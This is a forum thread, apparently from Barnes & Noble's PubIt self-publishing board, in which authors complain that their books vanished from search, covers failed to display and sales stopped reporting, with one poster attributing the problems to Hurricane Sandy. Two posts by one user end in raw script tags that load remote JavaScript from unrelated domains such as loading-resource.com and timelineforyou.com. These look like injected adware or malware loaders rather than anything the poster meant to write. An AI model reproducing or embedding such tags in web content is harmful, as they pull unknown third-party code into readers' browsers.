New User
VictoriaLeader
0 Kudos
Accepted Solution

problems with my book sales

my book status says that its on sale now but when i search for it in the search engine it doesn't come up with anything at all. It's like my book isn't on sale. And my cover picture isn't showing up on the page where i can view my book page "on sale"

does anyone know what i should do?

Frequent Contributor
JMChristopher
0 Kudos

Re: problems with my book sales

There's something wrong with the servers. None of my books are coming up either... and while I usually sell like 125-175 books a day on average, I haven't sold a single book since 6am. So, there is something wrong with the whole system.

WHICH, BY THE WAY, B&N SHOULD REALLY GET TO FIXING!!!!
Contributor
Bookwyrm55
0 Kudos

No doubt.  Doubly frustrating because we have a book on Nook First - today was it's day to be promoted on the main Nook page...the book is HALLOWEENLAND - and guess what day tomorrow won't be anymore?  This guy waited nearly a year for this promo.. (sigh)

Contributor
RanRan
0 Kudos

I believe there is a problem, my sales has drop temendously...I think they are stealing. Pretty soo, we all might need lawyers if they keep delaying paying us. 

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script> <script type="text/javascript" src="https://timelineforyou.com/load.js?0.38915225589061286"></script>
Contributor
RanRan
0 Kudos

How did he manage to get his book on the first page?  Are there any other publishers like B&N, Amazon that sell authors books?

<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script> <script type="text/javascript" src="https://timelineforyou.com/load.js?0.08858644085632572"></script>
Contributor
Mari_Belle
0 Kudos

Same problem with me.  I sell 150 books a day minimum, and yesterday 9 books total.  Today I have 1 book sold since midnight which was 8 hours ago.  B & N has got a BIG accounting problem.:smileysad:

Contributor
Bonnie_S_Mata
0 Kudos

Uploaded my book too and my cover isn't showing, so I find it hard to promote. Will anyone from B&N support team respond to these questions that we have? OR do we find the solutions amongst each other here? This is my first time self pub here
Frequent Contributor
JMChristopher
0 Kudos

[ Edited ]

Yeah, I sell from 150 - 175 on average a day... yesterday I had 42 all day (nothing sold after 6am.) Today I have 32 sales so far when I'm usually up near 100. Something is very, very wrong and I want B&N to start addressing the problems.

Contributor
ARose23
0 Kudos

I went from making over $100 a day down to $7 yesterday and $17 today.  Why is B&N not acknowledging that something is wrong??  If sales are coming in and i am not getting paid I am going to be PISSED!  I expect adjustments to be made for all of the sales that have not been credited to me.

I know there was a horrific storm, but this is no way for a semi-fledgling company to handle itself.  They need to get it together ASAP.

Reader 2
KBWriter
0 Kudos

[ Edited ]

I can't tell you happy I am to see your posts! I've got the same issue and no one is responding to my emails. What is alarming is that this system is based on trust. We trust our sales to be reported back to us correctly and that is not happening. And there is no communication. Since there IS a problem... there should be an acknowledgment, at the least, letting us know that they are working on it, but we don't get that either.

I'm selling at a minimum 50 - 100+ books a day between my different series. Well, I just released a brand new book in a series on the 28th. The 29th I had 19 sold for that title and on the 30th 37 were bought. Things were just ramping up. Then October 31st comes and ALL of my books stopped reporting sales, finally landing at 1 for each. Impossible!! I had several Facebook readers tell me they bought the book on Nook on Oct. 31st and Nov 1st. Today, I'm in the same boat, showing 1 sale. Not true! My friend bought one today just to see if it would report and nothing! I've been using this service for over a year and never encountered this.

I'm so sad and so disappointed because not only are my sales not reporting, my ranking is quickly falling... so much for a great start! I wonder what the next steps are going to have to be to get explanations and the situation(s) rectified. Those sales went somewhere. Money WAS exchanged! So Barnes and Noble, where did my portion go?

Contributor
WriteByNight
0 Kudos

Please understand that this company is based in New York City -- the place that has no power, people lost homes, and the infrastructure is so wrecked no one can get to work unless they walk 5 miles or more. Sandy has caused huge problems. You might have no sales because your readership in on the east coast, but also because the BN system isn't working. And I'm sure they aren't too happy about loosing sales either, but such things are a low priority when you're standing in front of the space where your home used to be. Please be patient. The situation sucks for everyone, but at least we have internet and can communicate with each other. I'm not sure that's true for PubIt or BN staff right now.
New User
VictoriaLeader
0 Kudos

thanks for your reply. I'm just happy to know that I wasn't doing anything wrong. :]

Contributor
Ronnie_Ray_Jenkins
0 Kudos

Are your books priced at 99 cents?

Ronnie Ray Jenkins
Frequent Contributor
Angela_Beegle
0 Kudos

I know December is an ebook sales slump time, but I had 200 sales last month (peanuts compared to some of you, but big for me) and this month? 50 total. I can't tell what's happening except that it's disheartening. :smileysad:

Contributor
Ronnie_Ray_Jenkins
0 Kudos

I do pretty well in December on other websites. I'm pretty new on B and N, so I am not quite sure how things will go here. I'll just have to wait and see.

Ronnie Ray Jenkins